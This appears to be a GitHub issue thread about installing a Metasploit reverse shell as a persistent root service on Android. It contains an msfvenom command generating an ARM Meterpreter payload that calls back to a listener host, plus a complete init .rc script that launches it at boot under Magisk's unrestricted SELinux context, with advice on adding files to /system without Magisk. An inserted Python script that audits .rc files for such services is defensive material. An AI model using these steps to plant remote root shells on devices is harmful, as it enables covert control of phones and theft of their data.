Open gabriel-maxx opened 10 months ago
Hi, thanks for your interest in the project.
The msfvenom is a CLI tool to build shell binaries, so it should be executed not on the smartphone, but on your computer. It can be used on any Linux OS, but it is already conveniently embedded into Kali. -p linux/armle/meterpreter/reverse_tcp is a type of payload - reverse shell, TCP, for Linux OS and ARM CPUs; -f elf is a file format - Linux binary executable. So, when it runs it will connect to the LHOST host on the LPORT port (you must control this host and have a listener waiting there for the connection), and you will get a shell to the target device.
The idea is to build a "native" Android binary for an ARM architecture CPU, put it alongside the other system binaries on your smartphone (/system/bin/revshell), which are available system-wide, and then run it as a daemon when the OS loads. To run it as a daemon you have to make an init script (an .rc script in the case of Android; think of it as a systemd unit in other Linux distributions). While you have to generate the binary for your own specific case, the content of the init script is very simple and it is always like this:

service revshell /system/bin/revshell
    disabled
    seclabel u:r:magisk:s0
    shutdown critical

on property:sys.boot_completed=1
    start revshell

So create the file /system/etc/init/revshell.rc on your smartphone with the content above and it will automatically be executed by the init process during system load. The stuff in this script is:

service revshell /system/bin/revshell - pretty much self-explanatory. It is the definition of your system service in the format service SERVICE_NAME PATH_TO_SERVICE_BINARY.

disabled - is the marker that tells init that the service is disabled by default, but the conditions of its start are described below (on property:sys.boot_completed). The idea is to not start the service until the system and other services are fully booted, just in case, to make sure everything is smooth, no missing mounts etc.

seclabel u:r:magisk:s0 - it is the definition of the SELinux context that needs to be set on your service process. That's the most critical part. Magisk injects a special SELinux context for itself to run its own daemon (magiskd), and this context is "almighty": it has absolutely zero restrictions in the system; technically magiskd spawns new processes with shells for you when you call su with this exact context. If you do not place that line here, the init process will refuse to start your service, as there is no prescribed transition rule to start the revshell service from the init process context.

shutdown critical - this line tells init to consider this service critical for the system. It is not strictly necessary but adds some minor benefits, so why not?

Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges.
The installer that is generated by the tool in this repo will produce a flashable zip file that can be installed via TWRP or other custom recovery projects that provide adb sideload mode. It will automatically create the /system/etc/init/revshell.rc file for you with all the content and put it into /system.
Hope it helps, sorry for the long answer.
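As an added defender-side example (not code from the issue or from the repo it discusses), the script below parses init .rc files the way init tokenises them and flags services that are absent from a baseline, carry the u:r:magisk:s0 seclabel, or are started on sys.boot_completed, which is exactly the pattern described above. The sample .rc text and the baseline set are constructed.

```python
"""Audit Android init .rc files for suspicious persistent services.
Added example, not code from the issue or project; SAMPLE_RC and BASELINE
are constructed (a real baseline comes from a known-good image)."""

# constructed: one benign-looking service plus the script from the issue
SAMPLE_RC = """\
service logd_demo /system/bin/logd
    class core

service revshell /system/bin/revshell
    disabled
    seclabel u:r:magisk:s0
    shutdown critical

on property:sys.boot_completed=1
    start revshell
"""
BASELINE = {"logd_demo"}  # service names expected on this image

def parse_rc(text):
    """Map service name -> {exec, options, triggers}. init tokenises lines;
    'service'/'on' open a section, later lines belong to it (indent is cosmetic)."""
    services, section = {}, None  # section: ("service", name) or ("on", trigger)
    def blank(): return {"exec": None, "options": [], "triggers": []}
    for raw in text.splitlines():
        tok = raw.split("#", 1)[0].split()
        if not tok:
            continue
        if tok[0] == "service" and len(tok) >= 3:
            section = ("service", tok[1])
            services.setdefault(tok[1], blank())["exec"] = tok[2]
        elif tok[0] in ("on", "import"):
            section = ("on", " ".join(tok[1:])) if tok[0] == "on" else None
        elif section and section[0] == "service":
            services[section[1]]["options"].append(tok)
        elif section and tok[0] == "start" and len(tok) == 2:
            # a trigger may start a service defined later or in another file
            services.setdefault(tok[1], blank())["triggers"].append(section[1])
    return services

def audit(text, baseline):
    """Flag services that are unknown, carry Magisk's unrestricted seclabel,
    or are started once the system reports boot completion."""
    findings = []
    for name, svc in parse_rc(text).items():
        if name not in baseline:
            findings.append(f"{name}: not in baseline, exec={svc['exec']}")
        if ["seclabel", "u:r:magisk:s0"] in (o[:2] for o in svc["options"]):
            findings.append(f"{name}: seclabel u:r:magisk:s0 (unrestricted)")
        if "property:sys.boot_completed=1" in svc["triggers"]:
            findings.append(f"{name}: started on sys.boot_completed")
    return findings
```

Run it over every file under /system/etc/init, /vendor/etc/init and /odm/etc/init with a baseline pulled from a trusted image of the same build to spot services that were added after the fact.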
Thanks for the explanation, but my problem is that I've tried everything and I can't install Magisk on my phone. I think my model is incompatible, but I have root access, so I would like to know: is it possible to do this without Magisk, just with root access?
Hm, perhaps I didn't understand you properly. So your problem is that you already have root but do not have magisk? Is that some multimedia device? Or an emulator?
Technically, you can install this binary and service script into your system, but you have to make sure that there are no working system integrity measures, like verified boot and dm-verity. If there are none, then just remount your partition or make a mount overlay to add new files to your system fs.
However, I must warn you: if there are some measures, then your device might be bricked after you write new files to /system. Please be cautious. I cannot give you any advice; you have to understand the risks and investigate that yourself.
Hi, could you tell me something? If I have a rooted Android device, then how do I:
msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f elf -o revshell
I copy the revshell binary to /system/bin/ and then I create a revshell.rc script and copy it to /system/etc/init/, but could you explain to me what the content of this rc script would look like? What do I have to put inside for it to work?